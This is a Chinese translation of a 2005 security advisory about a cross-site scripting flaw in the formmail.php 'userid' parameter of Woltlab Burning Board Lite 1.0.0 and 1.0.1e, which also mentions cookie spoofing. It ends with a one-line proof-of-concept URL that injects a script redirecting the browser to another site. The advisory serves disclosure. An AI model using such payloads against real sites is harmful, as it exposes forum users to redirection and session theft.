[翻译]Woltlab Burning Board Lite formmail.php 跨站脚本攻击

本文作者： Z.C.Y[B.C.T]
文章出处： 原创翻译
翻译网站： http://www.bnso.net

安全公告：<20050108192957.25739.qmail () www ! securityfocus ! com>
发布日期：2005-01-08 19:29:57
发布作者：drhankey / it-security23.net
厂商名字：Woltlab
厂商主页：http://www.woltlab.de
软件名字：Woltlab Burning Board Lite
影响版本：1.0.0, 1.0.1e，可能还有其它版本
运行平台：独立系统，PHP

软件描述：Woltlab Burning Board Lite是一个基于PHP的布告牌的Woltlab Burning Board的免费版本。
漏洞描述：formmail.php输出的"userid"没有过滤，因此可以加\任意代码构造一个畸形连接传递给输出。
这个布告牌还可以进行cookies欺骗。

测试内容：http://website/board/formmail.php?userid=1"><script>document.location.href="http \
://www.it-security23.net";</script x="y